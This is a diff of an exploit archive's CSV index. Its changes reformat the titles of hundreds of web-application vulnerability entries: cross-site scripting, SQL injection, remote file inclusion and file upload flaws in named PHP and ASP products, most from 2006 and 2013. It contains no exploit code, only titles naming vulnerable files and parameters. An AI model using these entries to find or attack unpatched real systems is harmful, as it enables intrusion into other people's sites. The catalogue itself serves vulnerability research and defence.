Request Forgery (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 -28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 +28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - 'PMPopup.php' Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 28719,platforms/php/webapps/28719.txt,"Joomla! Component VirtueMart Joomla! eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (2)",2006-09-27,ThE-WoLf-KsA,php,webapps,0 @@ -30728,24 +30729,24 @@ id,file,description,date,author,platform,type,port 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 -28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 +28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - 'cart.php' Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 -28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - '/admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - '/admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - '/admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - '/admin/currencies.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - '/admin/languages.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - '/admin/manufacturers.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - '/admin/products_expected.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - '/admin/reviews.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - '/admin/specials.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - '/admin/stats_products_purchased.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - '/admin/stats_products_viewed.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - '/admin/tax_classes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - '/admin/tax_rates.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - '/admin/zones.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 @@ -30779,7 +30780,7 @@ id,file,description,date,author,platform,type,port 28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 -28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 +28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - 'search.php' Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 @@ -30800,9 +30801,9 @@ id,file,description,date,author,platform,type,port 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusions",2006-10-19,SuBzErO,php,webapps,0 -28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 +28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - 'config.php' SQL Injection",2006-10-20,G1UK,php,webapps,0 28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0 -28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - 'smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0 +28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 @@ -30816,27 +30817,27 @@ id,file,description,date,author,platform,type,port 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 -28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 -28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - 'consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 +28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - 'user.php' Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 +28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 -28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 -28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0 +28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - 'Change_Pass.php' Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 +28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - 'dir.php' Directory Traversal",2006-10-27,Christopher,php,webapps,0 28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - search.asp SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 -28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - 'db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - 'db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - '/db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php?Username' SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 -28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 -28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 +28881,platforms/php/webapps/28881.txt,"Foresite CMS - 'Index_2.php' Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 +28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - 'Htmlarea.php' Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusions",2006-10-31,MEFISTO,php,webapps,0 -28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0 +28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - 'search.php' SQL Injection",2006-10-31,Paisterist,php,webapps,0 28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 +28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - 'NQUser.php' Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28892,platforms/php/webapps/28892.txt,"RSSonate - Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 @@ -30849,14 +30850,14 @@ id,file,description,date,author,platform,type,port 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2006-11-03,AL-garnei,php,webapps,0 28903,platforms/php/webapps/28903.txt,"ac4p Mobile - 'send.php?cats' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - 'up.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps,0 -28905,platforms/php/webapps/28905.txt,"ac4p Mobile - 'cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 +28905,platforms/php/webapps/28905.txt,"ac4p Mobile - '/cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - 'archive.php?PID' Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 -28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0 +28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - 'popup.php' SQL Injection",2006-11-04,x23,php,webapps,0 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - 'Install.php3' Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 -28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 +28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - 'NewList.php' Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 @@ -30888,19 +30889,19 @@ id,file,description,date,author,platform,type,port 28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusions",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 -28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - 'newsletters/edition.php' tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 +28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - '/newsletters/edition.php' tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - 'ls.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-09,"laurent gaffie",php,webapps,0 28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2006-11-09,"laurent gaffie",php,webapps,0 28952,platforms/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",php,webapps,0 -28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x - 'blogs/list_blogs.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x - 'fisheye/list_galleries.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x - '/blogs/list_blogs.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x - '/fisheye/list_galleries.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28959,platforms/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 -28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - 'fisheye/index.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - 'wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - 'wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - '/fisheye/index.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - '/wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,php,webapps,80 @@ -30944,10 +30945,10 @@ id,file,description,date,author,platform,type,port 29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - default.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - index.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 - Pilot.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29014,platforms/asp/webapps/29014.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 -29015,platforms/asp/webapps/29015.txt,"Car Site Manager - 'csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29016,platforms/asp/webapps/29016.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 -29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 +29014,platforms/asp/webapps/29014.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 +29015,platforms/asp/webapps/29015.txt,"Car Site Manager - '/csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29016,platforms/asp/webapps/29016.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 +29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - 'get_password.php' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 @@ -30972,8 +30973,8 @@ id,file,description,date,author,platform,type,port 29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injections",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps,0 29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 - 'igallery.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"Aria-Security Team",asp,webapps,0 -29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 -29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 +29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - 'Announce.php' Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 +29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - 'blog.php' Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - 'dispimage.asp?id' SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 @@ -30988,7 +30989,7 @@ id,file,description,date,author,platform,type,port 29065,platforms/php/webapps/29065.txt,"WHMCompleteSolution (WHMCS) 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 29150,platforms/php/webapps/29150.txt,"WordPress Theme SAICO 1.0 < 1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 -29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 +29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - 'Spellwin.php' Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Theme Area53 - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 29071,platforms/php/webapps/29071.txt,"cPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 29072,platforms/php/webapps/29072.txt,"PHP Upload Tool 1.0 - Arbitrary File Upload / Directory Traversal",2006-11-17,"Craig Heffner",php,webapps,0 @@ -31012,7 +31013,7 @@ id,file,description,date,author,platform,type,port 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 -29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 +29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - 'list.php' Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php?msg' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 @@ -31048,14 +31049,14 @@ id,file,description,date,author,platform,type,port 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 +29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - 'Users.Profile.Inc.php' SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad 